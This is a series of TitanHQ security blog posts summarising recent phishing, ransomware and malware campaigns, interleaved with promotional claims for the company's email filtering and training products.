The platform is also proving popular with cybercriminals who are using it for phishing campaigns and malware distribution. According to Bitdefender, the antivirus company whose technology powers the SpamTitan email sandboxing feature, more than 50,000 malicious links have been detected on Discord in the past 6 months. Around a year ago, a campaign was detected that used Discord to send links to a malicious site resulting in the delivery of PureCrypter malware – a fully featured malware loader that is used for distributing information stealers and remote access trojans.

Discord responded to the misuse of the platform and implemented changes such as adding a 24-hour expiry for links to internally hosted files, which made it harder for malicious actors to use the platform for hosting malware. While this move has hampered cybercriminals, the platform is still being used for malware distribution. One of the latest malicious Discord campaigns is concerned with obtaining credentials and financial information rather than distributing malware.

The campaign involves sending links that offer users a free Discord Nitro subscription. Discord Nitro provides users with perks that are locked for other users, such as being able to use custom emojis anywhere, set custom video backgrounds, HD video streaming, bigger file uploads, and more. Discord Nitro costs $9.99 a month, so a free account is attractive.

If the user clicks the link in the message, they are directed to a fake Discord website where they are tricked into disclosing credentials and financial information. Other Discord Nitro lures have also been detected along the same theme, offering advice on how to qualify for a free Discord Nitro subscription by linking to other accounts such as Steam. According to Bitdefender, 28% of detected malicious uses are spam threats, 27% are untrusted, around 20% are phishing attempts and a similar percentage involve malware distribution.

Any platform that allows direct communication with users can be used for phishing and other malicious purposes. Security awareness training should cover all of these attack vectors and should get the message across to end users that they always need to be on their guard whether they are on email, SMS, instant messaging services, or the phone. By running training courses continuously throughout the year, businesses can develop a security culture by training their employees to be constantly on the lookout for phishing and malware threats and developing the skills that allow them to identify threats.

Developing, automating, and updating training courses to include information on the latest threats, tactics techniques, and procedures used by threat actors is easy with the SafeTitan security awareness training platform. SafeTitan makes training fun and engaging for end users and the platform has been shown to reduce susceptibility to phishing and malware threats by up to 80%.

If you are not currently running a comprehensive security awareness training program for your workforce or if you are looking to improve your training. Give the TitanHQ team a call and ask about SafeTitan. SafeTitan is one product in a suite of cloud-based security solutions for businesses and managed service providers, which includes an enterprise spam filter, a malicious file sandbox for email, a DNS-based web filter, email encryption, email archiving, and phishing protection for M365.

How to Protect Against Advanced Email and SMS Phishing Threats

Email phishing is the most common form of phishing, with email providing threat actors with an easy way of getting their malicious messages in front of employees. Phishing emails typically include a URL along with a pressing reason for clicking the link. The URLs are often masked to make them appear legitimate, either with a button or link text relevant to the lure in the message. Email attachments are often added to emails that contain malicious scripts for downloading a variety of malicious payloads, or links to websites where malware is hosted.

While there are many email security solutions available to businesses, many lack the sophistication to block advanced phishing threats as they rely on threat intelligence, antivirus software, and reputation checks. While these are important and effective at blocking the bulk of phishing and malspam emails, they are not effective at blocking zero-day attacks, business email compromise, and advanced phishing threats.

More advanced features include email sandboxing for detecting and quarantining zero-day malware threats and malicious scripts, greylisting for increasing the spam catch rate, and AI and machine learning capabilities that can assess messages and identify threats based on how they differ from the messages that are typically received by the business. SpamTitan, a cloud-based anti-spam service from TitanHQ, has these features and more. Independent tests have shown that the solution blocks more than 99.99% of spam emails, 99.95% of malware, and more than 99.91% of phishing emails. SpamTitan can be provided as a hosted email filter or as a gateway spam filter for installation on-premises on existing hardware, serving as a virtual anti-spam appliance.

Microsoft 365 users often complain about the phishing catch rate of the protections provided by Microsoft, which are EOP only for most licenses and EOP and Defender for the most expensive licenses. While these protections are effective at blocking spam and known malware, they fall short of what is required for blocking advanced threats. To improve Microsoft 365 security and block the threats that Microsoft misses, TitanHQ has developed PhishTitan. PhishTitan augments Microsoft 365 defenses and is the easiest way of improving the Office 365 spam filter. These advanced defenses are now vital due to the increase in attacks. The Anti-Phishing Working Group (APWG) has reported that more phishing attacks were conducted in 2023 than ever before.

Massive Increase in Text Message Phishing Scams

Blocking email phishing attempts is straightforward with advanced email security solutions, which make it much harder for phishers to get their messages in front of employees. One of the ways that threat actors have adapted is by switching to SMS phishing attacks, which no email security solution can block. APWG has reported a major increase in SMS-based phishing attempts.

A recent study attempted to determine the extent to which SMS phishing is being used. Researchers used SMS gateways – websites that allow users to obtain disposable phone numbers – to obtain a large number of phone numbers for the study. They then waited to see how long it took for SMS phishing messages to be received. The study involved 2,011 phone numbers and over 396 days the researchers received an astonishing 67,991 SMS phishing messages, which averages almost 34 per number. The researchers analyzed the messages and identified 35,128 unique campaigns that they associated with 600 phishing operations. Several of the threat actors had even set up URL shortening services on their own domains to hide the destination URLs. With these shortening services, the only way to tell that the domain is malicious is to click the link.

Blocking SMS phishing threats is difficult for businesses and the primary defense is security awareness training. SMS phishing should be included in security awareness training to make employees aware of the threat, as it is highly likely that they will encounter many SMS phishing threats. The SafeTitan security awareness platform makes creating training courses simple and the platform includes training content on all types of threats, including SMS, voice, and email phishing. With SafeTitan it is easy to create and automate campaigns, as well as deliver training in real-time in response to employee errors to ensure training is provided when it is likely to have the greatest impact – immediately after a mistake is made.

Sophisticated Phishing Campaign Abuses Cloudflare Workers

Cloudflare Workers is being abused in phishing campaigns to obtain credentials for Microsoft, Gmail, Yahoo!, and cPanel Webmail. The campaigns identified in the past month have mostly targeted individuals in Asia, North America, and Southern Europe, with the majority of attacks conducted on organizations in the technology, finance, and banking sectors.

Cloudflare Workers is part of the Cloudflare Developer Platform and allows code to be deployed and run from Cloudflare’s global network. It is used to build web functions and applications without having to maintain infrastructure. The campaigns were identified by researchers at Netskope Threat Labs. One campaign uses a technique called HTML smuggling, which involves abusing HTML5 and JavaScript features to inject and extract data across network boundaries. This is a client-side attack where the malicious activities occur within the user’s browser. HTML smuggling is most commonly associated with malware and is used to bypass network controls by assembling malicious payloads on the client side. In this case, the malicious payload is a phishing page.

The phishing page is reconstructed in the user’s browser, and they are prompted to log in to the account for which the attacker seeks credentials, such as their Microsoft account. When the victim enters their credentials, they will be logged in to the legitimate website and the attacker will then collect the tokens and session cookies.

Another campaign uses adversary-in-the-middle (AitM) tactics to capture login credentials, cookies, and tokens, and allow the attackers to compromise accounts that are protected with multi-factor authentication. Cloudflare Workers is used as a reverse proxy server for the legitimate login page for the credentials being targeted. Traffic between the victim and the login page is intercepted to capture credentials as well as MFA codes and session cookies. The advantage of this type of attack is the user is shown the exact login page for the credentials being targeted. That means that the attacker does not need to create and maintain a copy of the login page.

When the user enters their credentials, they are sent to the legitimate login page by the attacker, and the response from the login page is relayed to the victim. The threat actor’s application captures the credentials and the tokens and cookies in the response. In these CloudFlare Workers phishing campaigns, users can identify the scam by looking for the *.workers.dev domain and should be trained to always access login pages by typing the URL directly into the web browser.

Defending against sophisticated phishing attacks requires a combination of security measures including an email security solution with AI/machine learning capabilities and email sandboxing, regular security awareness training, and web filtering to block the malicious websites and inspecting HTTP and HTTPS traffic. For more information on improving your defenses, give the TitanHQ team a call.

Recommended Mitigations Against Black Basta Ransomware Attacks

The Black Basta ransomware-as-a-service (RaaS) group has been aggressively targeting critical infrastructure entities in North America, Europe, and Australia, and attacks have been stepped up, with the group’s affiliates now known to have attacked at least 500 organizations worldwide. In the United States, the group has attacked 12 of the 16 government-designated critical infrastructure sectors, and attacks on healthcare providers have increased in recent months.

Black Basta is thought to be one of multiple splinter groups that were formed when the Conti ransomware group shut down operations in June 2022. The group breaches networks, moves laterally, and exfiltrates sensitive data before encrypting files. A ransom note is dropped and victims are required to make contact with the group to find out how much they need to pay to a) prevent the publication of the stolen data on the group’s leak site and b) obtain the decryption keys to recover their encrypted data.

The group uses multiple methods for initial access to victims’ networks; however, the primary method used by affiliates is spear phishing. The group has also been observed exploiting known, unpatched vulnerabilities in software and operating systems. For instance, in February 2024, the group started exploiting a vulnerability in ConnectWise (CVE-2024-1709). The group has also been observed abusing valid credentials and using Qakbot malware. Qakbot malware is commonly distributed in phishing emails.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) recently issued a cybersecurity alert about Black Basta in response to the increase in attacks. The alert shares indicators of compromise and the tactics, techniques, and procedures used by the group in recent attacks. All critical infrastructure organizations have been advised to implement a range of mitigations to make it harder for Black Basta ransomware affiliates to access internal networks and move laterally. The recommended mitigations will also strengthen defenses against other ransomware groups and should be considered by all businesses and organizations.

Phishing and spear phishing are common access vectors for ransomware groups and the initial access brokers many of the groups work with, including the operators of Qakbot malware. Strengthening phishing defenses should therefore be a priority. TitanHQ offers three products that help improve phishing defenses: SpamTitan Email Security, PhishTitan, and the SafeTitan security awareness training and phishing simulation platform.

SpamTitan is a comprehensive email security and spam filtering service that blocks the full range of threats including spam, phishing, malware, viruses, and other malicious emails. Independent tests have confirmed the solution has a 99.99% spam catch rate, Bayesian autolearning and heuristics defend against advanced email threats, recipient verification using SPF, DKIM, and DMARC, antivirus protection is provided using two leading anti-virus engines, and the solution incorporates sandboxing for deep analysis of suspicious files. The sandbox is capable of detecting threats from their behavior rather than email signatures and is capable of identifying and blocking zero-day malware threats. The solution is regularly rated the best spam filter for business by independent software review sites and is one of the most popular spam filters for MSPs.

PhishTitan is a powerful anti-phishing solution for businesses that use Microsoft 365 that protects against the advanced attacks that Microsoft’s EOP and Defender miss. The solution includes auto-remediation features to help businesses rapidly respond when they are targeted by cybercriminal groups, and integrates seamlessly with Microsoft 365, augmenting Microsoft’s protections to ensure that more phishing threats are identified and blocked. PhishTitan adds banner notifications to emails from external email accounts and warnings about unsafe content, rewrites URLs to show the true destination, provides time-of-click protection against malicious URLs, provides threat data and analytics to help users assess their risk profile, and subjects all emails to AI and LLM analysis, detecting phishing threats with a high degree of accuracy and blocking threats that Microsoft misses. The solution also uses real-time analysis and threat assessments to neutralize business email compromise and spear phishing attacks before they begin.

It is important to train the workforce on how to recognize and report phishing attempts. SafeTitan is a comprehensive security awareness training platform that provides training in bite-sized chunks. The training modules are no longer than 10 minutes and are easy to fit into busy workflows. By providing regular training each month, businesses can develop a security culture and significantly improve resilience to phishing and spear phishing attacks, especially when combined with phishing simulations. The phishing simulator includes templates from real-world ransomware campaigns, and they are regularly updated based on the latest threat intelligence.

As an additional protection, multi-factor authentication should be implemented on all accounts, and phishing-resistant MFA is the gold standard. Since vulnerabilities are often exploited, it is important to ensure that software, firmware, and operating systems are kept up to date with patches applied promptly. Ransomware groups such as Black Basta are quick to exploit known vulnerabilities in their attacks. Remote access software should be secured and disabled if it isn’t used, networks should be segmented to hamper lateral movement, and backups should be regularly made of all critical data, with copies stored securely offsite on air-gapped devices. Further recommended mitigations can be found in CISA’s StopRansomware Guide.

TitanHQ Announces New Strategic Alliances with Evanti Tech & Nanjgel CSMS

TitanHQ has announced two new strategic alliances that will improve access to the company’s cybersecurity solutions in the Indian subcontinent and the Middle East. Evanti Tech is a Mumbai-based provider of IT infrastructure, cloud, and security services that helps to protect Indian businesses against cyberattacks, ransomware attacks, and other cybersecurity threats. The new alliance with TitanHQ will see Evanti Tech serve as a value-added distributor, incorporating TitanHQ’s cloud-based email security solutions into its cybersecurity suite to provide its clients with multi-layered protection capable of defending against a constantly evolving cyber threat landscape. The addition of TitanHQ’s email security solutions will allow the company to better protect its clients from email-based threats such as ransomware, malware, phishing, spear phishing, and business email compromise.

TitanHQ has also announced a new alliance with the Dubai, UAE-based cybersecurity managed service (CSMS) provider Nanjgels. Nanjgels protection methodology is based on five pillars of security – Protect, Identify, Detect, Remediate, Respond, with the company providing infrastructure security, user security, network security, data & app security, and security operations and response.  Under the new alliance, Nanjgels will be adding SpamTitan email security solutions to its portfolio and will be offering them to all clients in the region to help them improve email security and block spam, phishing, spear phishing, BEC, ransomware, and other email threats.

The SpamTitan suite of products has been developed from the ground up to meet the needs of managed service providers and help them better protect their clients from email-based threats. SpamTitan includes double anti-virus protection to block known malware threats, email sandboxing to identify and block zero-day malware threats, protection against malicious links in emails, and spam detection mechanisms such as SPF, DKIM, DMARC, and greylisting to block more than 99.99% of spam and unwanted emails. The solution scans inbound and outbound emails and includes data loss protection features to combat insider threats.

Multi-award-winning SpamTitan is an ideal solution for protecting Microsoft 365 accounts. Almost 20% of phishing emails circumvent Microsoft 365 Exchange Defender and Microsoft Exchange Online Protection (EOP). SpamTitan integrates seamlessly with Microsoft 365 to augment defenses and block the phishing and malware threats that Microsoft misses. SpamTitan has achieved 36 consecutive VB Bulletin Anti-Spam awards, and recent independent tests have confirmed the solution blocks in excess of 99.95% of malware.

TitanHQ’s multi-tenant solutions are hugely popular with managed service providers as they make it easy to sell, onboard, manage, and deliver advanced security solutions directly to their client base and reduce the amount of time that MSPs need to devote to protecting their clients. TitanHQ offers antispam solutions for MSPs, phishing protection, DNS filtering, email encryption, email archiving, security awareness training, and phishing simulations. If you are a managed service provider looking to improve security, contact TitanHQ to find out more about the TitanShield program and the products you can easily add to your security stack to better protect your clients.

U.S. Government and Education Sectors Targeted in Multi-Malware Phishing Campaign

The U.S. government and education sectors are being targeted by cybercriminals looking to steal sensitive data. These sectors hold large volumes of sensitive data that are easily monetized, victims can be extorted, and access to compromised networks can be sold to other cybercriminal groups such as ransomware gangs. These attacks can result in significant data breaches, major financial losses, and reputational damage that is hard to repair.

The campaign uses a combination of two malware variants and vulnerability exploitation, and the attack starts with phishing emails with malicious attachments. The campaign was identified by researchers at Veriti and delivers the notorious Agent Tesla remote access trojan (RAT) and an information-stealing malware called Taskun. Agent Tesla provides attackers with remote access to networks and is often used by initial access brokers for compromising networks, with the access sold on to other cybercriminal groups. Agent Tesla can be used to download additional payloads and has comprehensive information-stealing capabilities. The malware can log keystrokes, take screenshots, and steal credentials from browsers, wireless profiles, and FTP clients.

Taskun malware is spyware that also has information-stealing capabilities. In this campaign, the malware is used to compromise systems and make it easier for Agent Tesla to be installed, establish persistence, and operate undetected for long periods. The campaign involves emails with malicious attachments, with social engineering techniques used to trick employees into running malicious code that exploits unpatched vulnerabilities in operating systems and Office applications. The campaign involves a reconnaissance phase to identify the vulnerabilities that can be exploited to maximize the chance of a highly impactful compromise. The vulnerabilities exploited in this campaign include several Microsoft Office remote code execution vulnerabilities dating from 2010 to 2018 and takes advantage of businesses with poor patch management practices, incomplete inventories of connected devices, and devices running outdated software due to issues upgrading.

Defending against email-based attacks involving multiple malware variants and vulnerability exploitation requires a multi-layered approach to security, with cybersecurity measures implemented that provide overlapping layers of protection. The first line of defense should be advanced spam filtering software to block inbound spam and phishing emails. SpamTitan from TitanHQ is an AI-driven cloud-based email filtering service that is capable of identifying and blocking spam and phishing emails and has advanced malware detection capabilities. In addition to dual antivirus engines, the SpamTitan hosted spam filter includes email sandboxing for behavioral detection of malware threats. In independent tests, SpamTitan was shown to block 99.983% of spam emails, 99.914% of phishing emails, and 99.511% of malware.

It is important to ensure that employees are made aware of the threats they are likely to encounter. Security awareness training should be provided to teach cybersecurity best practices, eradicate risky practices, and train employees to be vigilant and constantly on the lookout for signs of phishing and malware. The SafeTitan security awareness training platform makes it easy to develop and automate comprehensive training and keep employees up to date on the latest tactics used by threat actors. SafeTitan, in combination with TitanHQ’s cloud-based anti-spam service, will help to ensure that phishing and malware threats are identified and blocked.

Cybersecurity best practices should also be followed, such as implementing multi-factor authentication on accounts, ensuring patches are applied promptly, keeping software up to date, installing endpoint antivirus solutions, and network segmentation to reduce the impact of a successful attack. It is also important to ensure there is a comprehensive inventory of all devices connected to the network and conduct vulnerability scans to ensure weaknesses are detected to allow proactive steps to be taken to improve security.

More Than Half of Cyber Insurance Claims are for Email-Based Attacks

Business Email Compromise (BEC) is one of the most financially harmful cyberattacks. BEC is an attack where a cybercriminal uses social engineering techniques or phishing to gain access to an email account with a view to tricking people into disclosing sensitive and valuable data that can be sold or used in other types of attacks or scams. The goal of many BEC attacks is to trick senior executives, budget holders, or payroll staff into making fraudulent wire transfers, changing account details for upcoming payments, or altering direct deposit information to payroll payments directed to attacker-controlled accounts. When the attack results in a fraudulent wire transfer it is often referred to as Funds Transfer Fraud (FTF).

For the past several years, the biggest cause of losses to cybercrime – based on complaints filed with the Federal Bureau of Investigation’s (FBI) Internet Crime Complaint Center (IC3) – was BEC attacks. In 2022, IC3 received reports of losses of $2.7 billion from BEC attacks and $2.9 billion in losses in 2023. A recent report from the cyber insurance provider, Coalition, explored the reasons why claims were made on policies and by far the biggest cause of claims was fraud from attacks that originated in inboxes. More than half of claims were for losses that started with emails, with 28% of claims made for BEC attacks and 28% for FTF. The number of claims related to email-based attacks makes it clear that email security is an important aspect of cyber risk management. If you want to reduce cyber risk, email security is one of the best places to start and this is an area where TitanHQ can help.

TitanHQ’s anti spam software, SpamTitan, is an advanced email security solution for businesses and managed service providers that protects against the full range of email-based attacks by blocking spam, phishing, spoofing, malware, and zero-day attacks. SpamTitan includes dual antivirus engines for detecting known malware threats, sandboxing for behavioral analysis of emails to detect zero-day threats, reputation checks, and AI algorithms to anticipate new attacks. SpamTitan is delivered as a cloud-based anti-spam service or an anti-spam gateway, and is one of the most popular MSP spam filtering solutions.

PhishTitan is a relatively new addition to the TitanHQ cybersecurity portfolio and has been developed to improve Microsoft 365 security and catch the sophisticated phishing and BEC threats that Microsoft 365 misses. PhishTitan augments EOP and Defender and detects phishing threats with unbeatable accuracy and minimal false positives, with the solution adapting to new phishing tactics through comprehensive phishing feeds curated by TitanHQ and feedback from end users. PhishTitan rewrites URLs to show their true destination, provides time-of-click protection against URLs in phishing emails, protects against malware, adds banner notifications to emails to warn end users, makes post-delivery remediation quick and easy, and provides next-generation protection against phishing and BEC attacks.

In addition to solutions that block spam and phishing emails, end user security awareness training is important. Email-based attacks target employees and use social engineering to trick them into disclosing sensitive information, downloading malware, and making fraudulent wire transfers. SafeTitan from TitanHQ is a comprehensive security awareness training and phishing simulation platform for training the workforce to be more security aware, showing employees how to recognize and avoid threats, and keeping them up to date on the latest tactics targeting them. The platform also includes a phishing simulator for conducting fully automated phishing simulations. SafeTitan is the only behavior-driven security awareness solution that delivers security training in real-time in response to errors, ensuring training is delivered when it will have the most impact.

Email will continue to be a major attack vector but with TitanHQ solutions in place, you will be well protected. Give the TitanHQ team a call today for more information about these and other TitanHQ security products. All three of these products are available on a free trial to allow you to test them out for yourself and see the difference they make.

Cybersecurity Solutions That Adapt to Constantly Changing Phishing Threats

Phishing typically involves impersonation of a trusted individual or brand. In email phishing, the sender’s email address is often spoofed to make it appear that the messages have been sent from a legitimate domain, the emails often include the spoofed company’s logo, the color scheme used by that company, and the messages themselves are often very similar to the official emails sent by that brand.

It stands to reason that the most commonly impersonated brands are large tech companies, as more people are familiar with those companies and use their products and services. It should not come as a surprise to hear that the most impersonated brand in Q1, 2024 was Microsoft, which was impersonated in 38% of all phishing attacks, according to data from Check Point Research, up from 30% of attacks in the previous quarter. Google was the second most impersonated brand and was impersonated in 11% of phishing attacks, up from 8% in Q4, 2023.

Phishing attacks impersonating Amazon fell from 9% in Q4, 2023 to just 3% in Q1, 2024. The fall in attacks can be explained by fewer online sales after the holiday period, with phishers favoring other brands at the start of the year. There was an increase in attacks impersonating LinkedIn to target job seekers in response to an increase in job hunting in the New Year. LinkedIn rose to third place and was impersonated in 11% of attacks. Another seasonal increase was a rise in attacks impersonating Airbnb, which made it into the top 10 most impersonated brands, likely due to the increase in holiday bookings in the New Year.

Cybercriminals often change tactics and respond to seasonal changes, such as increasing attacks impersonating delivery firms and online retailers in the run-up to the holiday season, and piggyback on the popularity of major news stories and sporting events. This year is an Olympics year, and the European Football championships will be held in Germany in June. Lures related to these events are certain to be used as interest grows over the coming weeks as the events draw closer.

What is clear from phishing data is attacks are becoming more numerous and more sophisticated. According to tracking data by the Anti-Phishing Working Group (APWG), there were more than five million phishing attempts reported in 2023, the highest total ever recorded by APWG. Attacks against social media platforms showed a marked increase as the year drew to an end and accounted for almost 43% of all phishing attacks.

QR code phishing is also increasing. QR codes are used to send traffic to malicious URLs, and they are highly effective for phishing. Email security solutions typically check embedded hyperlinks against lists of known malicious domains, with many following hyperlinks and assessing the sites that users are redirected to. Many email security solutions, however, lack the capability to read QR codes, so the messages often end up in inboxes where they can be opened by end users.

It is not only email phishing that is increasing. Vishing – voice phishing attacks continue to rise and there was a major increase in Business Email Compromise (BEC) attacks, which the APWG data shows increased by 24% compared to the previous quarter.  As phishing attacks increase in number and sophistication, businesses need to ensure that their defenses are capable of blocking these threats and that their employees are trained to be on high alert and constantly look for the signs of phishing in all communications.

One of the most important protective measures for businesses is to have an effective Office 365 spam filter. The anti-spam and anti-malware protections put in place by Microsoft and included with all licenses (EOP) are effective at blocking spam and known malware, but it is not so effective at blocking zero-day phishing and malware threats, many of which land in users’ inboxes. The more advanced protection that is provided with Microsoft’s E5 premium license improves phishing detection considerably, yet even this measure does not block many sophisticated phishing attempts. As such, many businesses are keen to improve the Office 365 spam filter and look for a third-party cybersecurity solution.

An increasing number of businesses are signing up for advanced AI- and machine learning-driven protection from TitanHQ to improve protection for Microsoft 365 environments. The engine that powers two of TitanHQ’s most popular cybersecurity solutions – SpamTitan and PhishTitan-  has VBSpam+ certification from Virus Bulletin and in Q1, 2024 tests, was found to have a spam catch rate of 99.983%, a phishing catch rate of 99.914%, a malware catch rate of 99.51%, and a false positive rate of 0.00%. Overall, the engine got a 99.983% overall score.

SpamTitan is a cost-effective, easy-to-use email security solution for stopping phishing attacks, spam, malware, and ransomware. The solution features AI-based phishing protection via the newest zero-day threat intelligence, double malware protection with two antivirus engines, a next-generation sandbox for analyzing the behavior of messages to identify zero-day threats, and the solution is easy to integrate with Microsoft 365 to improve protection.

PhishTitan is a cloud-based, next-generation phishing protection and remediation solution that has been developed for use with Microsoft 365 that can identify and block the advanced phishing threats that Microsoft misses. PhishTitan has a high detection accuracy and uses AI to assess the content, tone, and meaning of emails to identify unusual, suspicious, and malicious messages. The solution also adapts to constantly evolving phishing tactics.

URLs in phishing emails are rewritten to identify their true destination, are compared to an extensive range of intelligence feeds, and the solution provides time-of-click protection against malicious links in emails. The solution also learns from user feedback to further improve accuracy and applies banners to emails warning about potentially malicious content and can be used by IT teams to automate the remediation of phishing emails from inboxes.

Phishing attacks are getting more sophisticated and tactics are constantly changing, but with the advanced protection provided by SpamTitan and PhishTitan that significantly improves the Microsoft 365 spam filter, businesses will be prepared. Give the TitanHQ team a call for more information, to arrange a product demonstration, or to sign up for a free trial to put the solutions to the test.

Two Dozen Healthcare Email Accounts Compromised in Targeted Phishing Campaign

Many phishing campaigns involve indiscriminate emails that are sent in high volume in the hope that some recipients will respond. These campaigns tend to involve lures that are likely to be opened by as many users as possible such as missed deliveries, security warnings about unauthorized account access, and payments that will soon be applied to accounts. This spray-and-pray tactic is not nearly as effective as more tailored campaigns targeting specific types of users, and to make up for this, the campaigns involve huge volumes of messages. These campaigns are relatively easy for email security solutions to detect.

Phishing campaigns that target employees in a single organization can be much harder to identify. The threat actor tailors the message to the organization being targeted, and even to specific employees in the organization. These campaigns often use compromised vendor email accounts, with the emails being sent from trusted domains. There is a much greater chance of these emails landing in inboxes and the emails being opened by employees. Campaigns such as this can be highly effective and often result in many email accounts in the organization being compromised.

A recent example of this type of attack and the impact it can have comes from California. ​The Los Angeles County Department of Health Services, an integrated health system that operates public hospitals and clinics in L.A. County, was targeted in a phishing campaign between February 19, 2024, and February 20, 2024. The emails appeared to have been sent by a trusted sender, landed in inboxes, and were opened by many employees. The emails contained a hyperlink that directed users to a website where they were told they needed to enter their login credentials. 23 employees fell for the scam and entered their credentials.

The credentials were captured, and the threat actor was able to access the employees’ email accounts, which contained sensitive patient data such as names, dates of birth, contact information, medical record numbers, dates of service, medical information, and health plan information. While the information exposed in the attack could not be used for identity theft – Social Security numbers were not compromised – the attacker gained access to information that could be used for medical identity theft. The patients affected could also be targeted in very convincing phishing campaigns to obtain further information such as Social Security numbers. Similar attacks have been reported by other healthcare organizations where the email accounts contained vast amounts of data, including tens of thousands of Social Security numbers and sensitive financial information.

After attacks such as this, additional security awareness training is provided to the workforce to raise awareness of the threat from phishing; however, the provision of comprehensive training regularly throughout the year will go a long way toward ensuring that attacks such as this do not succeed and that if they do, the resultant data breach is far less severe.

TitanHQ’s SafeTitan security awareness training platform allows organizations to conduct comprehensive training continuously, and since each training module is a maximum of 10 minutes, it is easy to fit the training into busy workflows. The training platform has a huge range of content, covering a broad range of threats, and when programs are run continuously and employees complete a few training modules a month, susceptibility to phishing drops considerably, especially when the SafeTitan phishing simulator is also used. The simulator includes templates taken from recent real-world phishing campaigns. If a user responds to one of these simulations, they are immediately told where they went wrong and are required to complete a training module relevant to that threat.

End-user security awareness training is an important part of your cybersecurity arsenal, but it is also vital to block as many phishing emails as possible. TitanHQ’s SpamTitan email security is an advanced, AI and machine learning-driven anti-spam solution that blocks more than 99.9% of spam email and phishing threats. The solution includes twin antivirus engines for blocking known malware, and sandboxing for blocking zero-day threats, and is a highly effective spam filter for Office 365. With SafeTitan security awareness training and an advanced Microsoft 365 spam filter from TitanHQ, businesses will be well protected from phishing threats.

All TitanHQ solutions are intuitive, easy to use, and can be set up in just a few minutes and are available on a free trial to allow you to test them out for yourself before making a purchase decision. Independent reviews from genuine users of TitanHQ solutions show SpamTitan is much loved by users. On G2 reviews, SpamTitan is consistently given 5-star reviews by end users, who rate it the best spam filter for Outlook due to its effectiveness, low cost, ease of use, and the excellent customer service from the TitanHQ team.

SafeTitan and SpamTitan are available on a free trial to allow you to test them out for yourself before making a purchase decision. Give the TitanHQ team a call today to take the first step toward improving your phishing defenses.

Remcos RAT Now Distributed in Spam Email Using VHD Attachments

Cybercriminals are constantly evolving their tactics for delivering malware and one of the most recent changes concerns the Remcos RAT.  Remcos was developed by Breaking Security as a legitimate remote administration tool that can be used for network maintenance, system monitoring, surveillance, and penetration testing; however, the tool has been weaponized to create the Remcos Remote Access Trojan (RAT).

The Remocos RAT has extensive capabilities and has been used by cybercriminals since 2016. The malware allows threat actors to take control of systems and maintain persistent, highly privileged remote access. The malware can be used for a range of purposes, with threat actors commonly using it for credential theft, man-in-the-middle internet connections, and to create botnets of infected devices that can be used for distributed denial of service attacks (DDoS).

The Remcos RAT is distributed in spam email campaigns. Since 2016, the most common method for distributing the malware used spam emails with malicious Office attachments. Social engineering techniques were used to trick users into opening the files and enabling macros; however, campaigns have recently been detected that deliver the malware via weaponized virtual hard disk (VHD) files.

Security awareness training often focuses on teaching users to be careful when opening Office files and other file types commonly associated with malware distribution. The change to a more unusual file type could result in the file being opened, and VHD files are less likely to be identified as malicious by email security solutions.

An analysis of the extracted VHD files revealed a shortcut file that contained a PowerShell command line that executed a malicious script that ultimately delivered the Remcos RAT via a sophisticated multi-stage delivery method designed to evade security solutions. Once installed, the malware can log keystrokes, take screenshots, and exfiltrate data to its command-and-control server. The malware also has mass-mailer capabilities and can send copies of itself via email from an infected device. According to Check Point, the Remcos RAT rose to the 4th most prevalent malware threat in March 2024.

The constantly changing tactics for distributing malware mean network defenders need cybersecurity solutions that can adapt and detect zero-day threats. SpamTitan is an advanced email filtering service with AI and machine learning-driven threat detection which is capable of identifying and blocking novel phishing and malware distribution methods. The machine learning algorithm uses predictive technology to identify previously unseen attacks, emails are scanned using twin antivirus engines, and suspicious file types are sent to a next-generation sandbox for behavioral analysis, ensuring even previously unseen malware variants can be identified and blocked.

SpamTitan scans all inbound emails and also includes an outbound email filter to identify malicious emails that are sent from compromised email accounts and by malicious insiders. SpamTitan also has data loss protection capabilities, allowing IT teams to detect and block internal data loss. If your corporate email filter does not include advanced threat protection including AI-driven detection and sandboxing, or if you rely on Microsoft’s anti-spam and anti-phishing protection, sophisticated threats such as zero-day attacks are unlikely to be blocked and your business will be at risk.

Give the TitanHQ team a call today to find out more about SpamTitan. SpamTitan is delivered as a cloud-based anti-spam service that integrates seamlessly with Microsoft 365 to improve protection, or as a gateway solution for on-premises protection, which can be installed on existing hardware as a virtual anti-spam appliance.

Phishing Attempts Increase 40% in a Year

Cybercriminals use a variety of methods for initial access to victims’ networks and tactics are constantly changing. Ransomware groups are increasingly targeting boundary devices such as routers, firewalls, and the virtual private networks that sit between the Internet and business networks, with the first quarter of this year seeing a decline in attacks exploiting vulnerabilities for initial access. According to the ransomware remediation firm Coveware, remote access is now favored by ransomware groups. In Q1, 2024, Remote Desktop Protocol (RDP) compromise was the most commonly identified initial attack vector.

Phishing is still commonly used for initial access, although there has been a fall in phishing-based attacks by ransomware groups; however, it is common for ransomware groups to chain email phishing with RDP compromise and the exploitation of software vulnerabilities for more impactful attacks. What is clear from the data is threat actors are conducting more sophisticated attacks and are taking steps to cover their tracks. Coveware reports that the initial access vector was unknown in around 45% of attacks.

While ransomware groups may be concentrating on non-email attack vectors, phishing attempts by cybercriminals have increased significantly over the past year. A new analysis by researchers at the antivirus company Kaspersky found that phishing attempts increased by 40% in 2023, with threat actors increasingly using messaging apps such as Telegram in their attacks as well as social media networks.

Phishing is also becoming more sophisticated and increasingly personalized. There is growing evidence that threat actors are using generative artificial intelligence engines to craft new lures to use in their campaigns, especially spear phishing attacks. The near-perfect messages that GenAI creates can make it difficult for end users to distinguish phishing emails from genuine communications.

The problem for many businesses is threat actors are constantly evolving their tactics and are conducting increasingly sophisticated campaigns, yet email security defenses are not maintaining pace. Many Microsoft 365 users find that while Microsoft Defender and EOP block a good percentage of spam emails and many phishing threats, more sophisticated threats are not detected. Having a cybersecurity solution such as PhishTitan augments Microsoft 365 defenses and ensures sophisticated threats are blocked. For every 80,000 emails received, PhishTitan catches 20 unique and sophisticated phishing attacks that Microsoft’s expensive E5 premium security misses.

PhishTitan helps with post-delivery remediation, allowing security teams to rapidly remove phishing threats from the email system when a threat is reported, adds a banner to emails warning users about suspicious messages, and rewrites URLs to show the true destination to combat spoofing. The solution also includes time-of-click protection to combat phishing links that are weaponized after delivery, and AI- & LLM-driven anti-phishing analysis to identify previously unseen phishing threats.

The use of malware in email campaigns is also increasing. In 2023, 6.06 billion malware attacks were identified worldwide, up 10% from the previous year, with loaders, information stealers, and remote access trojans (RATs) the most common malware threats. While signature-based detection mechanisms once served businesses well, the rate at which new malware variants are released means many threats are not detected as malware signatures have yet to be uploaded to antivirus defenses. The key to blocking these zero-day threats is email sandboxing.

